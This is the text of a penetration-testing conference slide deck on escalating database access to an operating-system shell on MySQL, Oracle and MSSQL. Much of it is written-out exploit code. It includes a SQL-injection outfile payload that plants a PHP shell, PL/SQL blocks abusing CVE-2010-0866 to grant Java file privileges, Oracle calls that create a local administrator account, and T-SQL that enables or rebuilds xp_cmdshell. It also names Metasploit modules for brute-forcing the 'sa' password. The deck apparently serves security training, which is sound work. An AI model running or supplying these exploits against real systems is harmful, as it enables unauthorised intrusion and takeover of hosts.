rock'n roll in database s
TRANSCRIPT
![Page 1: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/1.jpg)
Rock'n Roll in Database Security
Prathan Phongthiproek (Lucifer@CITEC)Senior Information Security Consultant
ACIS Professional Center
![Page 2: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/2.jpg)
Who am I ?
CITEC Evolution Code Name “Lucifer”, Moderator, Speaker Instructor: Web Application (In) Security 101 Instructor: Mastering in Exploitation
ACIS Professional Center Red Team : Penetration Tester Instructor / Speaker Security Consultant / Researcher
Founder of CWH Underground Hacker Exploits, Vulnerabilities, Papers Disclosure
Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc http://www.exploit-db.com/author/?a=1275
![Page 3: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/3.jpg)
Let’s Talk !?
“Get DBA privilege is good but get SHELL is better !!”
MySQL PWNED !! From Web Application to get SHELL
Oracle Escalating Privilege XPL For get SHELL
MSSQL Credentials Attack For get SHELL
![Page 4: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/4.jpg)
MSSQL and Oracle Vulnerabilities
2002 2003 2004 2005 2006 2007 2008 20090
40
80
120
160
24
30 0 0 0
11
0
46
12
25
61
144
4148
36
SQL Server Oracle
![Page 5: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/5.jpg)
MySQL Jump into OS
MySQL5.x Vulnerability, 0-Day on Immunity CANVAS
SQL Injection via Web Application (Top Hit !!) MySQL Outfile Function
Need writable directory Need Absolute path Need Magic_quote off Union select 1,‘code’,3,4 into outfile
“/www/htdocs/shell.php” MySQL Load_file Function (Better !!)
Need Absolute path Need phpMyAdmin path or MySQL 3306 was opened at
firewall Union select 1,load_file(0x4332…………)
![Page 6: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/6.jpg)
MySQL PWNED !! From Web Application to get SHELL
![Page 7: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/7.jpg)
Oracle Escalating Privilege XPL For get SHELL – PL/SQL Injection
Dbms_cdc_publish3 – For Oracle 10gR1-11gR2
Dbms_cdc_publish2
Dbms_cdc_publish
Dbms_metadata_open
Dbms_export_extension
It_findricset_cursor
It_compressworkspace
It_mergeworkspace
It_removeworkspace
It_rollbackworkspace
![Page 8: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/8.jpg)
Oracle Escalating Privilege XPL For get SHELL
DBMS_JVM_EXP_PERMS package that allow any user create privilege to grant themselves java IO Privileges
CVE-2010-0866
Affect Oracle 10g-11g (Windows Only)
Defense Apply October 2010 Critical Patch Update Oracle 11gR2 on Windows still secure Revoke privileges from users to execute
DBMS_JVM_EXP_PERMS
![Page 9: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/9.jpg)
Oracle Escalating Privilege XPL For get SHELL
XPL Code (Grant JAVA IO Privilege)
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission',’<<ALL FILES>>','execute','ENABLED' from dual;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;
![Page 10: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/10.jpg)
Oracle Escalating Privilege XPL For get SHELL
XPL Code (OS Execute)
select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ’net user prathan 1234 /add’) from dual;
select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe', '/c', ’net localgroup administrators prathan /add’) from dual;
![Page 11: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/11.jpg)
Oracle Escalating Privilege XPL For get SHELL
![Page 12: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/12.jpg)
MSSQL Credentials Attack For get SHELL
‘SA’ is God Account, Run with SYSTEM Privilege on Windows
Default ‘sa’ password is blank password or guessable
Require “xp_cmdshell” stored procedures (Disable by default on MSSQL 2005+)
Enabled it with osql On MSSQL 2005
EXEC sp_configure ‘show advanced options’, 1
RECONFIGURE
EXEC sp_configure ‘xp_cmdshell’, 1
RECONFIGURE
![Page 13: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/13.jpg)
MSSQL Credentials Attack For get SHELL
On MSSQL 2000 Xp_cmdshell was drop by sp_dropextendedproc
EXEC sp_addextendedproc ‘xp_anyname’, ‘xp_log70.dll’ CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
![Page 14: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/14.jpg)
MSSQL Credentials Attack For get SHELL
Brute-Force ‘sa’ password and use sa credentials to run os command on target machine with Metasploit modules Scanner/mssql/mssql_ping Scanner/mssql/mssql_login Admin/mssql/mssql_exec Windows/smb/psexec
![Page 15: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/15.jpg)
IPWN4 – PenTest Tools (Jail-Broken)
Pen-Test Tools (Command-line) Metasploit Framework Social Engineering Toolkit Nmap Scanner, Amap, Hping Nbtscan, netcat Nikto2, dnsmap Ettercap-NG, Aircrack-NG
GUI Tools iTeleport Jaadu RDP iNet WiFiFoFum
![Page 16: Rock'n Roll in Database S](https://reader031.vdocuments.site/reader031/viewer/2022020101/55756647d8b42a2e248b4869/html5/thumbnails/16.jpg)
Full Compromise MSSQL via Iphone4